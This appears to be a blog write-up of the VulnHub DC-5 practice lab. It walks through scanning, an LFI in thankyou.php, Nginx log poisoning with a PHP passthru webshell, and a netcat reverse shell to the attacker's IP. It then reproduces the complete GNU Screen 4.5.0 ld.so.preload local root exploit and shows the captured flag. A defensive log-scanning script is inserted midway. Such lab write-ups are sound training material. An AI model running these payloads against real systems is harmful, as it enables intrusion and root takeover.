Target Machine Pentest Practice 73: DC5

止止_8fc8 2022-04-21 78 views
Web security

Target description

Target address: http://www.vulnhub.com/entry/dc-5,314/

1. Setting up the target environment

Attacker machine: Kali

Target machine

Note: the target and Kali only need to be on the same LAN (same subnet, i.e. both VMs use the same network mode).

The target environment is set up as follows

2. Hands-on

2.1 Network scanning

2.1.1 Start the target and Kali, then scan

Method 1: arp-scan -I eth0 -l (scan on a specified interface)

arp-scan -I eth0 -l

⬢  DC5  arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2     08:00:27:f9:57:76       PCS Systemtechnik GmbH
192.168.9.71    08:00:27:e8:60:97       PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.936 seconds (132.23 hosts/sec). 2 responded
Method 2: masscan <subnet to scan> -p <ports to scan>

masscan 192.168.184.0/24 -p 80,22

Method 3: netdiscover -i <interface> -r <subnet>

netdiscover -i eth0 -r 192.168.184.0/24

Method 4: left for you readers to add

2.1.2 Check the target's open ports

Use nmap -A -sV -T4 -p- <target IP> to check which ports the target has open

⬢  DC5  nmap -A -sV -T4 -p- 192.168.9.71
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-12 16:25 CST
Nmap scan report for bogon (192.168.9.71)
Host is up (0.00039s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.6.2
|_http-title: Welcome
|_http-server-header: nginx/1.6.2
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          42244/udp   status
|   100024  1          46756/udp6  status
|   100024  1          52931/tcp6  status
|_  100024  1          60025/tcp   status
60025/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:E8:60:97 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.39 ms bogon (192.168.9.71)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.53 seconds

Ports 80, 111 and 60025 are open.

2.2 Vulnerability enumeration

2.2.1 Port 80 analysis

Visit: http://192.168.9.71/

After looking around there is nothing obviously exploitable, so let's scan for directories first

⬢  DC5  dirsearch -u http://192.168.9.71

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.9.71/_22-04-12_16-29-16.txt

Error Log: /root/.dirsearch/logs/errors-22-04-12_16-29-16.log

Target: http://192.168.9.71/

[16:29:16] Starting: 
[16:29:29] 200 -    4KB - /contact.php
[16:29:29] 301 -  184B  - /css  ->  http://192.168.9.71/css/
[16:29:31] 200 -    6KB - /faq.php
[16:29:31] 200 -   17B  - /footer.php
[16:29:32] 301 -  184B  - /images  ->  http://192.168.9.71/images/
[16:29:32] 403 -  570B  - /images/
[16:29:32] 200 -    4KB - /index.php
[16:29:43] 200 -  852B  - /thankyou.php

Task Completed
⬢  DC5  

These pages are all linked from the home page and were already looked at; nothing there.

Going back to the page, I found something interesting

After some experimenting, it turns out the copyright year changes on every load, randomly between 2017 and 2020.

http://192.168.9.71/thankyou.php?firstname=&lastname=&country=australia&subject=

Judging from the URL pattern, hmm... I guess there may be a file inclusion vulnerability here.

If a file inclusion vulnerability exists, we need to find out how thankyou.php includes footer.php.

Use wfuzz to discover the parameter name

wfuzz -z file,/usr/share/wfuzz/wordlist/general/common.txt http://192.168.9.71/thankyou.php?FUZZ=/etc/passwd

So the full URL is

http://192.168.9.71/thankyou.php?file=footer.php

Extension

2.3 Exploitation

2.3.1 File inclusion vulnerability

Next let's read a file: simply replace footer.php with /etc/passwd.

Visit: http://192.168.9.71/thankyou.php?file=/etc/passwd

This is inconvenient to read, so let's view the page source instead

The dc user is found.

Since we can read the password file, we can also read the log file, which makes it convenient for us to read a planted webshell file.

Default system path: /var/log/nginx/access.log

Because of how the Nginx service works, every request we make to the site is written to the log file.

So we can use this log file to get a shell.

First write phpinfo() as a probe to see whether the inclusion actually works

Let's look at the log file to check whether it was planted successfully

Opening it in Firefox (URL: http://192.168.9.71/thankyou.php?file=/var/log/nginx/access.log) shows that the one-line webshell was written successfully.

Now write a system command execution statement directly and test whether commands can be passed in.

Capture the request with BurpSuite and insert the PHP command-execution code

<?php passthru($_GET['hh']); ?>

Test whether external commands execute normally:

http://192.168.9.71/thankyou.php?file=/var/log/nginx/access.log&hh=cat%20/etc/passwd

Here we can see that the external command executed normally.
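From the defender's side, the chain just used (a file= parameter pointing at /etc/passwd or at the Nginx access log, plus PHP code planted in a request so that it lands in that log) leaves a clear trace in access.log itself. As an added example, not code from the original write-up, here is a small Python detector run over constructed combined-format log lines that mirror the requests above; the function names (classify_value, analyze_line, scan_log) and the sample lines are my own.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed nginx combined-format lines mirroring the requests above (not from the real target).
SAMPLE_LOG = """\
192.168.9.7 - - [12/Apr/2022:16:29:31 +0800] "GET /faq.php HTTP/1.1" 200 6144 "-" "Mozilla/5.0"
192.168.9.7 - - [12/Apr/2022:16:53:06 +0800] "GET /thankyou.php?file=/etc/passwd HTTP/1.1" 200 2345 "-" "Mozilla/5.0"
192.168.9.7 - - [12/Apr/2022:17:01:07 +0800] "GET /thankyou.php?file=footer.php HTTP/1.1" 200 17 "-" "<?php phpinfo(); ?>"
192.168.9.7 - - [12/Apr/2022:17:03:36 +0800] "GET /thankyou.php?file=/var/log/nginx/access.log&hh=cat%20/etc/passwd HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
"""
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)  # PHP open tag planted in a request field
LOG_PATHS = ('/var/log/', '/proc/self/')                # classic targets for log / self inclusion

def classify_value(value):
    """Findings for one decoded query-string value."""
    findings = []
    if value.startswith(LOG_PATHS):
        findings.append('log_or_proc_include')
    if value.startswith('/') or '../' in value or '..\\' in value:
        findings.append('path_include')
    return findings

def analyze_line(line):
    """Parse one access-log line; return None if it is not in combined format."""
    m = COMBINED_RE.match(line.strip())
    if not m:
        return None
    findings = []
    parts = urlsplit(m.group('target'))
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl decoded once; a second pass catches double-encoding
        findings += [f'{f}:{name}' for f in classify_value(value)]
    # Log poisoning: PHP code in any field that nginx copies into access.log
    for field in ('target', 'referer', 'ua'):
        if PHP_TAG_RE.search(unquote(m.group(field))):
            findings.append(f'php_tag:{field}')
    return {'ip': m.group('ip'), 'path': parts.path, 'findings': findings}

def scan_log(text):
    """Return the parsed records (with line numbers) that carry at least one finding."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        rec = analyze_line(line)
        if rec and rec['findings']:
            hits.append({**rec, 'line': lineno})
    return hits
```

Running scan_log(SAMPLE_LOG) flags lines 2 to 4 and leaves the ordinary /faq.php request alone; a PHP open tag in the User-Agent is reported even when the file parameter itself looks harmless.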

Use nc to get a reverse shell directly

Command: hh=nc 192.168.9.7 6666 -c /bin/bash
On Kali, listen on port 6666 with: nc -lvvp 6666

Visit: http://192.168.9.71/thankyou.php?file=/var/log/nginx/access.log&hh=nc%20192.168.9.7%206666%20-c%20/bin/bash

⬢  DC5  nc -lvp 6666                    
listening on [any] 6666 ...
Warning: forward host lookup failed for bogon: Host name lookup failure : Resource temporarily unavailable
connect to [192.168.9.7] from bogon [192.168.9.71] 51816
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

As shown, we now have a reverse shell.

The usual routine

Switch to an interactive shell

python -c "import pty;pty.spawn('/bin/bash')"

2.4 Privilege escalation

2.4.1 Information gathering

sudo -l shows that the sudo command is not available.

Look for SUID programs: find / -perm -u=s -type f 2>/dev/null

www-data@dc-5:~/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs

Checking https://gtfobins.github.io/ shows that /bin/screen-4.5.0 is exploitable

Since there is no sudo command, this program has to be exploited another way.

Search the local exploit database on Kali: searchsploit screen 4.5.0

Try 41152.txt first

⬢  DC5  searchsploit -m linux/local/41152.txt                     
  Exploit: GNU Screen 4.5.0 - Local Privilege Escalation (PoC)
      URL: https://www.exploit-db.com/exploits/41152
     Path: /usr/share/exploitdb/exploits/linux/local/41152.txt
File Type: ASCII text

Copied to: /home/kali/vulnhub/DC/DC5/41152.txt


⬢  DC5  cat 41152.txt 
Commit f86a374 ("screen.c: adding permissions check for the logfile name",
2015-11-04)

The check opens the logfile with full root privileges. This allows us to
truncate any file or create a root-owned file with any contents in any
directory and can be easily exploited to full root access in several ways.

> address@hidden:~$ screen --version
> Screen version 4.05.00 (GNU) 10-Dec-16
> address@hidden:~$ id
> uid=125(buczek) gid=125(buczek)
groups=125(buczek),15(users),19(adm),42(admin),154(Omp3grp),200(algrgrp),209(cdgrp),242(gridgrp),328(nchemgrp),407(hoeheweb),446(spwgrp),453(helpdesk),512(twikigrp),584(zmgrp),598(edv),643(megamgrp),677(greedgrp),5000(abt_srv),16003(framesgr),16012(chrigrp),17001(priv_cpw)
> address@hidden:~$ cd /etc
> address@hidden:/etc (master)$ screen -D -m -L bla.bla echo fail
> address@hidden:/etc (master)$ ls -l bla.bla
> -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla
> address@hidden:/etc (master)$ cat bla.bla
> fail
> address@hidden:/etc (master)$

Donald Buczek <address@hidden>




EDB Note: Follow up ~ http://seclists.org/oss-sec/2017/q1/184#  

This exploit fails.

Next use 41154.sh

⬢  DC5  searchsploit -m linux/local/41154.sh
  Exploit: GNU Screen 4.5.0 - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/41154
     Path: /usr/share/exploitdb/exploits/linux/local/41154.sh
File Type: Bourne-Again shell script, ASCII text executable

Copied to: /home/kali/vulnhub/DC/DC5/41154.sh

⬢  DC5  cat 41154.sh 
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell#  

First compile the following code

gcc -fPIC -shared -ldl -o /home/kali/vulnhub/DC/DC5/libhax.so /home/kali/vulnhub/DC/DC5/libhax.c

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

Then rm -f /home/kali/vulnhub/DC/DC5/libhax.c

Second, compile the following code

gcc -o /home/kali/vulnhub/DC/DC5/rootshell /home/kali/vulnhub/DC/DC5/rootshell.c

#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

Modify the original 41154.sh bash script as shown below

#!/bin/bash
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

Then start an HTTP server with Python and upload these files to the target

Next comes the privilege escalation

www-data@dc-5:/tmp$ ls
ls
exp.sh  libhax.so  rootshell  screens
www-data@dc-5:/tmp$ chmod 777 exp.sh
chmod 777 exp.sh
www-data@dc-5:/tmp$ chmod 777 libhax.so
chmod 777 libhax.so
www-data@dc-5:/tmp$ chmod 777 rootshell
chmod 777 rootshell
www-data@dc-5:/tmp$ ./exp.sh
./exp.sh
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# ls
ls
thisistheflag.txt
# cat thisistheflag.txt
cat thisistheflag.txt


888b    888 d8b                                                      888      888 888 888 
8888b   888 Y8P                                                      888      888 888 888 
88888b  888                                                          888      888 888 888 
888Y88b 888 888  .d8888b .d88b.       888  888  888  .d88b.  888d888 888  888 888 888 888 
888 Y88b888 888 d88P"   d8P  Y8b      888  888  888 d88""88b 888P"   888 .88P 888 888 888 
888  Y88888 888 888     88888888      888  888  888 888  888 888     888888K  Y8P Y8P Y8P 
888   Y8888 888 Y88b.   Y8b.          Y88b 888 d88P Y88..88P 888     888 "88b  "   "   "  
888    Y888 888  "Y8888P "Y8888        "Y8888888P"   "Y88P"  888     888  888 888 888 888 
                                                                                          
                                                                                          


Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated.  :-)

I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.

After successful privilege escalation, the flag is obtained in the root directory.

Summary

On this target, information gathering revealed a file inclusion vulnerability; wfuzz was used to fuzz out the parameter name, a shell was obtained by writing to the Nginx log file, and privileges were escalated via screen.

  1. Information gathering
  2. Directory scanning with dirsearch
  3. Nginx log file exploitation
  4. Privilege escalation via screen